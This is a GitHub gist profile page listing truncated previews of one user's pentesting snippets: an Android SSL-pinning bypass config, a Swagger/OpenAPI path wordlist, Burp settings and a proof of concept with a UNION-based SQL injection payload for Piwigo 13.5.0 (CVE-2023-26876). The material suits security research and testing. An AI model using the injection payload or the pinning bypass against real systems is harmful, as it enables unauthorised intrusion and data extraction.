Skip to content

Instantly share code, notes, and snippets.

View rodnt's full-sized avatar
🐈‍⬛
see no evil ~ learning..

0x2e2f rodnt

🐈‍⬛
see no evil ~ learning..
View GitHub Profile
@rodnt
rodnt / mixunpinv2.js
Created December 26, 2023 19:47
Bypass Common SSL Pinning Android
/**
* by rodnt
* twitter: 0xrodnt
* Github: rodnt
*/
const config = {
flutterPatterns: {
android: "F? 0F 1C F8 F? 5? 01 A9 F? 5? 02 A9 F? ?? 03 A9 ?? ?? ?? ?? 68 1A 40 F9"
},
@rodnt
rodnt / paths.txt
Created December 5, 2023 17:18
Common api paths.. swagger..openapi..
/swagger-ui.html
/swagger-ui/
/swagger-ui/index.html
/api-docs
/v2/api-docs
/v3/api-docs
/swagger.json
/openapi.json
/api/swagger.json
/docs
@rodnt
rodnt / win11Pendrive.sh
Created December 2, 2023 10:20
Windows 11 bootable pendrive script
#!/bin/bash
# Function to select the USB device
select_usb_device() {
echo "Available USB devices:"
local devices=(/dev/sd*)
select usb_device in "${devices[@]}"; do
if [ -z "$usb_device" ]; then
echo "Invalid selection, please try again."
else
@rodnt
rodnt / gdb.md
Created September 11, 2023 10:36
gdb - basics

How to use GDB (Basics)

  • Load the program
    • gdb <program>
  • Run the program
    • run
    • run with arguments
      • run arga argb argc ..
  • Breakpoint
@rodnt
rodnt / ds_store.py
Created July 12, 2023 21:36
Parser for .ds_store files
# -*- encoding: utf-8 -*-
from ds_store import DSStore
from tqdm import tqdm
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--path", help="Path to the DS_Store file", required=True)
parser.add_argument("-t", "--type", help="Type : Iloc, bwsp, lsvp, lsvP, icvp", default='Iloc')
args = parser.parse_args()
@rodnt
rodnt / gist:962a0382a15fec71755a23bd7ad8294d
Created April 21, 2023 14:06
TLS Pass Through (Burp Suite) invisible captcha issues and some anoy services
Burp Suite > Proxy > Options > TLS Pass Through.
Add these:
*.google\.com
.*.gstatic).com
*.mozilla\.com
.*\.googleapis\.com
*.pkil.goog
@rodnt
rodnt / proof.md
Created April 18, 2023 14:03
POC - Authenticated SQL injection Piwigo 13.5.0 - CVE-2023-26876

POC - Authenticated SQL injection Piwigo 13.5.0

Payload: 12 UNION ALL SELECT CONCAT(0x4141414141,IFNULL(CAST(VERSION() AS NCHAR),0x20),0x4141414141)-- --

@rodnt
rodnt / Playground.swift
Created February 11, 2023 18:41
Custom SSLPinning iOS
func urlSession(_ session: URLSession, didReceive challenge: URLAuthenticationChallenge, completionHandler: @escaping (URLSession.AuthChallengeDisposition, URLCredential?) -> Void) {
if (challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust) {
if let serverTrust = challenge.protectionSpace.serverTrust {
var secresult = SecTrustResultType.invalid
let status = SecTrustEvaluate(serverTrust, &secresult)
if (errSecSuccess == status) {
if let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, 0) {
let serverCertificateData = SecCertificateCopyData(serverCertificate)
let data = CFDataGetBytePtr(serverCertificateData);
=begin
author: unp4ck
usage:
$ gem install http
$ ruby metricsDumper.rb -u https://example.com/prometheus
=end